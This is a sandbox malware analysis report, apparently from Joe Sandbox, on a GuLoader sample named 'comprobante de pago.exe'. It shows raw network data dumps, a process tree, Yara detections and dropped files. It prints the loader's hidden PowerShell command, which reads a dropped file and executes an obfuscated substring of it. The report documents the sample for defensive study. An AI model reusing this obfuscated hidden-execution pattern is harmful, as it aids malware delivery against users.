2025-03-12 11:07:20 UTC	1378	IN	Data Raw: 03 cf cf 6c f6 5e f9 1c 68 91 1a 8e c4 89 7d b7 0a dd 52 8d e5 48 ce d4 df 7f 5c 48 1a b3 68 ec c6 bb bc 15 b9 b0 4c 2e c3 b4 6b a7 b6 db 3a d6 4d 67 89 ff 83 11 0d 44 04 b0 0c f6 da c6 1f 6a db 59 58 86 3c 24 a5 03 61 a5 95 7d b6 c7 70 b4 8d a0 2d fc 2c 01 09 63 c5 39 04 2c 5e 7f 08 dc c5 bd 3f ba 77 bd fd 8d a9 21 f2 09 79 f8 ff b6 52 2c a2 e7 37 7e 98 9b 1c a1 8f dd 96 13 4a c9 f0 03 6e c2 bb 18 9b 47 33 95 8b 6f 66 6e 95 1e a7 4e 95 4a 7f 87 0a d2 cd ff ed 0a e3 e7 c5 69 cc d5 9c 85 e4 52 e5 78 f3 e9 e4 c2 ca 33 e3 83 bd 90 fe 5c f9 f0 03 ae 41 1a 39 0d 37 58 46 5e 6d cc 3c f1 cb fb d1 79 7f 40 7b 0c 0d c4 e6 f5 5a 35 9c d5 22 26 49 c2 f2 05 7a da 05 90 e7 91 bf 14 cc ca c5 3b d0 c9 a9 0b d7 52 ad 06 d3 52 fc 33 05 68 8d f7 c1 8c be 3e 96 6c 48 a0 98 Data Ascii: l^h}RH\HhL.k:MgDjYX<$a}p-,c9,^?w!yR,7~JnG3ofnNJiRx3\A97XF^m<y@{Z5"&Iz;RR3h>lH
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: a0 85 04 cf 8f d4 9c 44 fc 67 43 ad 1b 5d a2 01 6a 05 37 77 58 a5 dc 79 28 1a e7 5c 61 16 87 fd 5f 2b ca 02 69 f5 93 3d a7 7a 6d d1 77 91 e2 f5 dd 10 d1 f9 d1 c7 a4 ff f9 97 97 2b 8f 91 25 e5 bb 1d ff bf 44 69 d5 82 3c a3 4d e3 53 fa cd 57 b9 89 ee b0 1d 19 fb 44 f2 6f 1b 33 98 9b 00 38 43 06 b4 56 33 a6 88 0d 44 03 de 2b a1 e9 5f 1e 4d 4b 9d e6 5d 8a 7a cc 93 d5 b0 de 20 3e a7 25 5c cc 94 a9 e6 d0 0a 8c 12 a0 e0 1e cd f3 77 55 05 26 54 4b 88 52 34 d9 69 39 c7 9c f4 9a cd 70 e2 0c 00 c9 c1 d6 91 de 0d 84 41 f4 15 f0 fa d7 fd 04 cf 59 b3 ad 5b cb 76 3f c5 95 cb 77 4d 92 c0 ac 48 d4 b5 aa d7 a5 72 7b 41 21 18 f7 ff ae 8b 27 97 df 12 3f 89 01 fe 31 2c bc d8 f3 56 ef 62 96 4e 09 8b c4 82 78 eb 5d 05 89 b2 cf 09 d5 d0 b7 c1 c6 41 b6 b9 49 f9 ca 52 9b 42 27 aa Data Ascii: DgC]j7wXy(\a_+i=zmw+%Di<MSWDo38CV3D+_MK]z >%\wU&TKR4i9pAY[v?wMHr{A!'?1,VbNx]AIRB'
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: dd f7 67 ca 1f 75 cd 83 dc 0e 33 5f 7b d6 ba 4e 77 30 9e f8 df d1 0c c1 5f f9 3e 57 ab df 78 d5 4f fa f9 b4 fa 61 60 17 0e 16 02 ee 99 b1 2f 09 52 d7 33 46 df ef b5 51 e0 c2 ae b7 d5 50 86 79 b2 f8 2b fa 78 98 1c 37 19 be 31 80 2a d2 b8 cc a2 19 2d cd 06 68 c4 59 9e fc 97 b4 18 ef 77 c1 57 b2 e8 90 50 fc 6c a4 5c f3 54 4d f1 e3 58 46 6d 57 8c 59 03 a8 c1 ba 0d e5 69 d6 6b ac 61 d1 ef 0b 63 89 34 03 f4 b5 91 15 07 c7 5a 7b 1b bb 81 40 c3 55 07 ea c7 85 83 bc a6 39 85 49 34 33 a6 cd 62 fd fe 0c ea 08 70 44 a8 24 8a 65 a8 51 a7 e6 99 91 24 89 89 c1 52 4f 0e f8 fb cc 66 8b 3c 13 9a 71 82 70 b8 74 90 14 ac 56 5e 99 6a 7a 93 34 ac 22 aa 1a 64 a2 1f 02 54 b3 c9 89 b1 0b 02 5d 89 d8 84 39 cd 29 70 fa 00 49 e6 e0 5c 0d 1c a3 0e 67 2d 36 c2 f1 f9 cc 00 df 48 d4 77 Data Ascii: gu3_{Nw0_>WxOa`/R3FQPy+x71*-hYwWPl\TMXFmWYikac4Z{@U9I43bpD$eQ$ROf<qptV^jz4"dT]9)pI\g-6Hw
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: 6d 33 19 64 76 ef 92 86 51 88 1e 4e f2 db ab e1 08 35 9c 92 17 97 18 82 0d 2a a0 ca 14 d0 e7 69 9a b0 dd e8 a6 b6 8c 91 cc 4b d7 a3 88 8a c2 50 bf be 59 60 eb f3 a4 ef cc 2f 9e 2c 08 a0 70 85 66 28 1f 80 e3 16 bf 0c b9 6d b5 de a0 28 f9 a4 96 94 83 c4 45 37 d3 09 95 e8 d8 93 e3 b7 57 eb 33 de ad fc 5c 63 ea e3 17 52 66 22 c0 c0 82 45 51 7b ad 89 cd 4f 9f a5 8e 36 5c 00 3a 97 59 7d 9f c9 61 6c 27 14 58 ae ee 12 a6 76 63 f7 6b ff e8 da 0b 83 47 4b 48 f3 ff 7a 61 5f c4 82 c1 11 ca 0d fe 2f dc 6e 94 c6 8c 88 b8 9d ae a8 12 82 51 79 f2 d1 39 cb e9 34 a8 7a 08 81 23 95 6b bb 44 29 79 a7 0b de 39 19 65 3d 22 04 da 35 ca ea 48 7c 34 3a 16 47 4b f7 a8 ac 07 8f f2 85 4c f1 88 76 92 86 9a f0 bf d8 34 a5 8c 13 5e ab 4d f3 f5 97 43 b9 9c 06 6e 97 5b 58 ae 3c f9 bf d4 Data Ascii: m3dvQN5*iKPY`/,pf(m(E7W3\cRf"EQ{O6\:Y}al'XvckGKHza_/nQy94z#kD)y9e="5H\|4:GKLv4^MCn[X<
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: 83 d9 48 90 b5 ec d7 45 30 79 41 67 18 b6 ff 6c c9 67 97 d8 12 6b 89 25 bc 27 2c ed d8 87 56 72 23 87 4e 41 8b ad 82 77 aa 71 05 db b2 98 09 bf 91 a4 c1 8f 41 cf b9 c0 b9 c3 52 c5 42 48 aa 28 d4 7f 39 08 35 1b 61 97 bd 2a 34 b6 05 fc 77 64 a2 dd e1 19 96 ef bc c0 e3 b1 70 02 cd 01 49 5f 27 c6 ea 2c e2 10 a0 95 c8 93 0a 5a cf 80 8b 3b 50 ac 68 9e fe 3a 8e d1 dd 4b b8 53 79 10 51 d8 13 0c 1e 27 f0 4e d9 43 c3 bd c1 64 68 90 2a 34 eb 76 6f 0e e8 ab 0a 1f ea f9 23 3b a1 92 51 ea f4 17 75 56 ca 38 5f 80 29 53 33 f9 1a 22 af 94 e5 20 b9 96 8a fe 57 0c 54 56 25 6a 0f 05 c0 2a ff fa c8 aa 85 1f 11 a5 39 fc 6c 3e df 38 41 2e db 99 38 89 6b 30 54 90 1a 3e 1c 19 69 5e 87 0f a8 a2 42 be 73 12 8a 95 1c 43 3a 2b 91 d2 9a f7 d5 1e 55 7a e4 38 b5 29 c0 d6 97 ed f8 6b dd Data Ascii: HE0yAglgk%',Vr#NAwqARBH(95a4wdpI_',Z;Ph:KSyQ'NCdh4vo#;QuV8_)S3" WTV%j*9l>8A.8k0T>i^BsC:+Uz8)k
2025-03-12 11:07:20 UTC	1378	IN	Data Raw: 3c 13 73 ff 07 70 b8 54 90 65 eb 6d 55 59 1e 91 4d 52 c4 22 60 36 40 1e 30 2f 14 b3 df ed c8 eb 02 dc e5 f1 80 7a cd 48 14 65 26 be 8f d3 ef 4f 5c cb 25 67 2d 36 2b ba 71 cc 00 9c 3a ad 07 5f 70 e7 ea 4e 29 30 38 f9 6a f0 1f 87 85 37 5b 74 d4 2d 5b d7 ec a5 f1 5a 29 11 50 49 22 19 8a 8a f3 d6 8b 28 a9 58 ba c3 1d 77 46 7d 2d a8 b6 9d d6 06 f2 52 5b 9f 8f 33 9b de 0f 91 a0 17 67 d5 f0 cb be 73 e5 d1 d7 ef 66 98 3e 52 08 05 0d f6 a5 46 7a bd d5 8c 55 36 f7 58 4e d1 9c 55 7f 6d 05 a3 3e 95 8e ab fb 73 2e 30 3b a8 40 c6 3f 7d ef 0c 85 8b 12 3b 85 96 d2 ac 6a 64 35 60 b1 90 5b dd 78 b7 33 01 2d 9a 0c a8 f6 08 ce b4 c2 ba d6 77 c3 4f 2f 93 96 08 68 46 cc 0b 12 3e 70 ae b5 c7 a3 e0 15 ee 99 a0 4f 5c b4 f1 ad 42 b8 31 43 b5 6d b0 fb 88 d7 70 2d 20 92 a6 44 29 17 Data Ascii: <spTemUYMR"`6@0/zHe&O\%g-6+q:_pN)08j7[t-[Z)PI"(XwF}-R[3gsf>RFzU6XNUm>s.0;@?};jd5`[x3-wO/hF>pO\B1Cmp- D)

Target ID:	0
Start time:	07:06:02
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\comprobante de pago.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\comprobante de pago.exe"
Imagebase:	0x400000
File size:	839'098 bytes
MD5 hash:	969DA5CC61A21E2D5FD00A52254ECD8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1301557595.000000000279E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:06:03
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Imagebase:	0x550000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1872004874.0000000008750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1865523536.0000000006437000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1877174929.000000000AD60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:06:03
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7e2000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x5a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x8f0000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:07:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x8f0000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	07:08:02
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0xc0000
File size:	418'304 bytes
MD5 hash:	64ACA4F48771A5BA50CD50F2410632AD
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report comprobante de pago.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15jqc1jh.yds.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ckrqwvp.wgb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rn5opmyi.00d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1q0i41t.mha.psm1

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Halfman.ini

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Mordvaabnets.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Preadmonition20.ove

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Tonation.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Vuggevisens.tid

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\alderney.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\assuranceselskabets.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\coater.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\consolute.ini

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\doughfaceism.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\externomedian.jpg

Windows Analysis Report
comprobante de pago.exe